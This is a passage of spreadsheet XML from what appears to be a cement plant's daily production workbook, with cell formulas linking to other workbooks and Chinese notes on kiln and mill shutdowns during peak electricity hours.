      </c>
      <c r="Z51" s="238">
        <f>'[13]28'!$Y$30</f>
        <v>3302.78600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]28'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]28'!$E$19</f>
        <v>5863.57000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'27'!H52</f>
        <v>42573.6900000006</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1426140.94</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]28'!$I$19</f>
        <v>4390</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'27'!K52</f>
        <v>108091.373</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1389785.573</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]28'!$L$19</f>
        <v>39528.7600000507</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>27.2612137931384</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'[13]28'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]28'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'27'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]28'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'27'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]28'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]28'!$M$21+'[14]28'!$M$22+'[14]28'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]28'!$N$21+'[14]28'!$N$22+'[14]28'!$N$35</f>
        <v>42.62</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'27'!U53</f>
        <v>1221.13</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39555.557</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]28'!$Q$21+'[14]28'!$Q$22+'[14]28'!$Q$35</f>
        <v>109</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'27'!X53</f>
        <v>998</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40489</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]28'!$T$21+'[14]28'!$T$22+'[14]28'!$T$35</f>
        <v>1872.077</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]28'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'27'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]28'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'27'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]28'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]28'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]28'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]28'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'27'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]28'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'27'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]28'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]28'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'27'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]28'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'27'!K55</f>
        <v>8401.388</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>43837.038</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]28'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]28'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]28'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]28'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]28'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]28'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]28'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]28'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]28'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'27'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'27'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]28'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：9:05-22:10避峰停机；3#磨：10:00-22:20避峰停机；4#磨：0:00-22:10续停。</v>
      </c>
      <c r="R56" s="261"/>
      <c r="S56" s="261"/>
      <c r="T56" s="261"/>
      <c r="U56" s="261"/>
      <c r="V56" s="261"/>
      <c r="W56" s="261"/>
      <c r="X56" s="261"/>
      <c r="Y56" s="261"/>
      <c r="Z56" s="262"/>
    </row>
    <row r="57" ht="15.75" customHeight="1" spans="1:26">
      <c r="A57" s="191"/>
      <c r="B57" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C57" s="193"/>
      <c r="D57" s="193"/>
      <c r="E57" s="194">
        <v>160000</v>
      </c>
      <c r="F57" s="194"/>
      <c r="G57" s="225"/>
      <c r="H57" s="194">
        <f>G57+'27'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'27'!K57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G58+'27'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'27'!K58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G59+'27'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'27'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]28'!$Q$65</f>
        <v>窑:错峰续停。A组磨：11:30-24:00避峰停机。D1#磨：10:20-24:00避峰停机，D2#磨：10:20-24:00避峰停机。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G60+'27'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'27'!K60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'[14]28'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]28'!$E$6</f>
        <v>6064</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'27'!H61</f>
        <v>108963</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1224836</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]28'!$E$21</f>
        <v>4325.66</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'27'!K61</f>
        <v>111004.74</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1212164.82</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]28'!$H$6</f>
        <v>35727.4299999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>68.706596153846</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'[14]28'!$M$11+'[14]28'!$M$12+'[14]28'!$M$13+'[14]28'!$M$14+'[14]28'!$M$15+'[14]28'!$M$16+'[14]28'!$M$17+'[14]28'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]28'!$N$11+'[14]28'!$N$12+'[14]28'!$N$13+'[14]28'!$N$14+'[14]28'!$N$15+'[14]28'!$N$16+'[14]28'!$N$17+'[14]28'!$N$18</f>
        <v>2881</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'27'!H62</f>
        <v>75911</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>911904.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]28'!$Q$11+'[14]28'!$Q$12+'[14]28'!$Q$13+'[14]28'!$Q$14+'[14]28'!$Q$15+'[14]28'!$Q$16+'[14]28'!$Q$17+'[14]28'!$Q$18</f>
        <v>4366</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'27'!K62</f>
        <v>78453</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>912925.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]28'!$T$11+'[14]28'!$T$12+'[14]28'!$T$13+'[14]28'!$T$14+'[14]28'!$T$15+'[14]28'!$T$16+'[14]28'!$T$17+'[14]28'!$T$18</f>
        <v>15912.6339999999</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>63.6505359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]28'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]28'!$M$19+'[14]28'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]28'!$N$19+'[14]28'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'27'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]28'!$Q$19+'[14]28'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'27'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]28'!$T$19+'[14]28'!$T$20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G64+'27'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'27'!K64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G65+'27'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'27'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]28'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:正常。2#磨:8:00-22:45避峰停机。3#磨:8:00-22:10避峰停机。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G66+'27'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'27'!K66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G67+'27'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'27'!K67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'[15]28'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]28'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'27'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]28'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'27'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]28'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]28'!$Q$77</f>
        <v>1#磨运行正常。2#磨运行正常。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]28'!$D$43+'[15]28'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]28'!$E$43+'[15]28'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'27'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]28'!$H$43+'[15]28'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'27'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]28'!$K$43+'[15]28'!$K$44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'[15]28'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]28'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'27'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]28'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'27'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]28'!$K$45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G71+'27'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'27'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]27'!$Q$80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G72+'27'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'27'!K72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G73+'27'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'27'!K73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G74+'27'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'27'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]28'!$Q$83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G75+'27'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'27'!K75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G76+'27'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'27'!K76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G77+'27'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'27'!K77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G78+'27'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'27'!K78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'[16]28'!$E$7</f>
        <v>471.66</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'27'!H79</f>
        <v>15070.76</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>162199.23</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]28'!$I$7</f>
        <v>481.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'27'!K79</f>
        <v>13720.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>155611.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]28'!$L$7</f>
        <v>6235.04</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>12.47008</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'[16]28'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'27'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]28'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'27'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]28'!$Y$15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G81+'27'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'27'!K81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G82+'27'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'27'!K82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G83+'27'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'27'!K83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G84+'27'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'27'!K84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G85+'27'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'27'!K85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2">
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E17"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29/31</f>
        <v>0.935483870967742</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46020</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19435.34</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'28'!H5</f>
        <v>609488.91</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6764354.94</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23648.02</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'28'!K5</f>
        <v>670496.424</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6820567.555</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>206460.31</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>55.2032914438502</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]29'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]29'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]29'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]29'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]29'!$U$101</f>
        <v>33.1849137931034</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]29'!$V$101</f>
        <v>62.1474517906336</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]29'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]29'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]29'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]29'!$D$23+'[11]29'!$D$17+'[12]29'!$D$17+'[13]29'!$D$25+'[14]29'!$D$8+'[14]29'!$D$15+'[15]29'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]29'!$E$23+'[11]29'!$E$17+'[12]29'!$E$17+'[13]29'!$E$25+'[14]29'!$E$8+'[14]29'!$E$15+'[15]29'!$E$7</f>
        <v>1896</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'28'!H6</f>
        <v>9701</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>286050.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]29'!$I$23+'[11]29'!$I$17+'[12]29'!$I$17+'[13]29'!$I$25+'[14]29'!$E$23+'[14]29'!$E$30+'[15]29'!$H$7</f>
        <v>764.54</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'28'!K6</f>
        <v>21576.62</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>283774.32</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]29'!$L$23+'[11]29'!$L$17+'[12]29'!$L$17+'[13]29'!$L$25+'[14]29'!$H$23+'[14]29'!$H$30+'[15]29'!$K$7</f>
        <v>20237.22</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]29'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]29'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]29'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]29'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]29'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]29'!$V$102</f>
        <v>32.6583907254362</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]29'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]29'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]29'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]29'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]29'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'28'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]29'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'28'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]29'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]29'!$W$107</f>
        <v>107.692307692308</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]29'!$X$107</f>
        <v>126.2730813618</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]29'!$Y$107</f>
